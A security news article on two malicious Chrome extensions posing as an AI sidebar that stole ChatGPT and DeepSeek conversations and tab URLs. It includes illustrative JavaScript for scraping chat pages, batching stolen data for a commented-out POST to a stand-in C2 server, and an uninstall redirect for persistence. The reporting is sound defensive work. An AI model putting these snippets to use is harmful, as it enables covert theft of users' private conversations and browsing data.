Two malicious extensions made to look like a legitimate tool and installed a combined 900,000-plus times were used by bad actors to steal users’ browsing data and their conversations with AI models like ChatGPT and DeepSeek.
The two extensions – Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI (which has more than 600,000 users and carries Google’s “Featured” badge) and AI Sidebar with Deepseek, ChatGPT, Claude and more (300,000-plus users) – exfiltrate user conversations and all Chrome tab URLs every 30 minutes, sending the data to a remote command-and-control (C2) server controlled by the threat actors, according to researchers with OX Security.
The information exposed in the AI conversations includes proprietary source code and development queries shared with ChatGPT or DeepSeek; business strategies, competitive intelligence, and strategic planning discussions; personally identifiable information (PII) disclosed during conversations; and confidential research, legal matters, and sensitive corporate communications, OX Security researchers Moshe Siman and Tov Bustan wrote in a report this week.
Stolen browser history data includes not only the complete URLs from all Chrome tabs, but also search queries containing sensitive keywords and research topics; URL parameters that could contain session tokens, user IDs, and authentication data; and internal corporate URLs revealing organizational structure and tools.
“This data can be weaponized for corporate espionage, identity theft, targeted phishing campaigns, or sold on underground forums,” Siman and Bustan wrote. “Organizations whose employees installed these extensions may have unknowingly exposed intellectual property, customer data, and confidential business information.”
The discovery by OX Security adds to a growing list of incidents involving bad actors using seemingly legitimate malicious extensions placed in online marketplaces to expose and steal sensitive information. Koi Security wrote earlier this month about another malicious Chrome extension, used by more than 6 million people, that collected every user prompt and chatbot response in 10 of the most popular AI large language models (LLMs), including OpenAI’s ChatGPT, Google’s Gemini, Anthropic’s Claude, and Microsoft’s Copilot.
Also in December, Koi researchers reported on a threat group called ShadyPanda, which, for seven years, uploaded legitimate extensions onto browser marketplaces, building trust and a following before quietly deploying malicious updates.
There have been other reports this year of bad actors placing legitimate, working extensions in both the Google Chrome and Microsoft Edge web stores before weaponizing them through malicious updates.
Extensions are used to improve and customize users’ browsing experience. As more work moves into the browser, the attack surface of individual users and the companies they work for expands, according to security experts.
“Browser extensions aren’t niche tools anymore; they’re deeply embedded in how people work,” Grip Security researchers Ben Robertson and Guy Katzir wrote earlier this year. “But that convenience comes with risk, especially when security teams don’t have visibility into what’s installed, what it can access, or how it behaves after login. The attack surface has shifted. And while endpoint agents and network controls still matter, they can’t see what’s happening inside the browser. That’s where threats like token hijacking and data leakage quietly take shape.”
In the most recent case, the hackers created malicious extensions that impersonated a legitimate browser extension created by a company called AITOPIA. The extension adds a sidebar to any website, giving users the ability to chat with popular AI LLMs, OX Security’s Siman and Bustan wrote.
In the malicious extensions, the bad actors replicated the functionality of AITOPIA’s AI sidebar extension, but added malware that steals ChatGPT and DeepSeek conversations from the browser.
“This approach serves two purposes: It makes the malicious extensions appear functional and useful (increasing download rates), while the familiar AITOPIA interface masks the malicious activity occurring in the background,” they wrote. “The malware leverages broad ‘read all website content’ permissions to monitor user browsing activity. When a user visits ChatGPT or DeepSeek, the extension identifies active conversation pages and extracts both user prompts and AI responses in real-time.”
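The monitoring pattern the researchers describe could be sketched roughly as follows in a content script. This is a minimal illustration, not the actual malware's code: the hostnames are the real chat services, but the DOM selector and function names are hypothetical placeholders.

```javascript
// Sketch of how a content script with "read all website content" permissions
// might detect AI chat pages and scrape conversations. Hostnames are real
// services; the DOM selector is a hypothetical placeholder.
const CHAT_HOSTS = ['chatgpt.com', 'chat.openai.com', 'chat.deepseek.com'];

// Pure helper: decide whether a URL belongs to a monitored chat service.
function isConversationPage(url) {
  try {
    const { hostname } = new URL(url);
    return CHAT_HOSTS.some((h) => hostname === h || hostname.endsWith('.' + h));
  } catch {
    return false; // not a valid URL
  }
}

// DOM scraping only runs inside a real page (guarded so the sketch is inert
// outside a browser context). The attribute name is illustrative only.
function extractConversation() {
  if (typeof document === 'undefined') return [];
  return Array.from(document.querySelectorAll('[data-message-author-role]'))
    .map((el) => ({
      role: el.getAttribute('data-message-author-role'), // e.g. user/assistant
      text: el.textContent.trim(),
    }));
}
```

Because content scripts run inside the page itself, no network interception is needed; the extension simply reads the rendered prompts and responses out of the DOM.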
The stolen data is stored in a local database on the victim’s system and then exfiltrated in batches to the C2 server. The malware asks the user for permission to collect anonymized browser behavior; if permission is granted, the extension automatically listens for events such as visited URLs and ChatGPT and DeepSeek chats.
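The buffer-then-batch pattern described above can be sketched as a simple local queue that is drained on a timer. The class name, field names, and the C2 upload shown in the comment are assumptions for illustration; only the 30-minute interval comes from the report.

```javascript
// Sketch of local buffering followed by periodic batch exfiltration.
// The 30-minute interval matches the report; everything else is illustrative.
const FLUSH_INTERVAL_MS = 30 * 60 * 1000; // every 30 minutes

class ExfilQueue {
  constructor() {
    this.records = [];
  }

  // Each captured event (tab URL, chat message) is appended locally first,
  // timestamped, rather than being sent immediately.
  add(record) {
    this.records.push({ ...record, ts: Date.now() });
  }

  // Drain the local store, returning the batch that would be uploaded.
  drain() {
    const batch = this.records;
    this.records = [];
    return batch;
  }
}

// In the actual malware, a background timer would POST each drained batch
// to the C2 server, conceptually something like:
//   setInterval(() => fetch(C2_URL, { method: 'POST',
//     body: JSON.stringify(queue.drain()) }), FLUSH_INTERVAL_MS);
```

Batching this way keeps network traffic infrequent and bursty, which is harder to spot than a request fired on every captured event.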
The hackers also developed a clever way to ensure that at least one of the two malicious extensions remains on victims’ systems.
“When one of the extensions is uninstalled, it opens the other malicious extension inside a new tab, to trick users into installing the other extension instead,” Siman and Bustan wrote. “In order to hide their activities, the threat actors set up the privacy policy and uninstall redirection websites using the vibe coding tool Lovable, making it hard to trace back the creators of the websites.”
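Chrome provides a real API, chrome.runtime.setUninstallURL(), that opens a URL when an extension is removed, and the pairing trick could plausibly be built on it. A minimal sketch of that idea follows; the extension IDs are placeholders, not the real extensions' identifiers, and the report does not confirm which API the malware actually uses.

```javascript
// Sketch of the uninstall-redirect trick using Chrome's real
// chrome.runtime.setUninstallURL() API. The IDs below are placeholders.
const PARTNER_IDS = {
  'aaaa-extension-id': 'bbbb-extension-id', // each extension points at its sibling
  'bbbb-extension-id': 'aaaa-extension-id',
};

// Pure helper: Web Store page of the sibling extension, or null if unknown.
function partnerStoreUrl(myId) {
  const partner = PARTNER_IDS[myId];
  return partner
    ? 'https://chromewebstore.google.com/detail/' + partner
    : null;
}

// Guarded so the sketch is inert outside an extension context. In a real
// extension, uninstalling it would open the sibling's store page in a new tab.
if (typeof chrome !== 'undefined' && chrome.runtime && chrome.runtime.setUninstallURL) {
  chrome.runtime.setUninstallURL(partnerStoreUrl(chrome.runtime.id));
}
```

Each extension registering its sibling's store page as the uninstall URL would produce exactly the behavior the researchers describe: removing one immediately confronts the user with an install page for the other.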
The OX Security researchers wrote that they notified Google about both malicious extensions on December 29, and that the Google team responded the next day by saying they were reviewing the issue.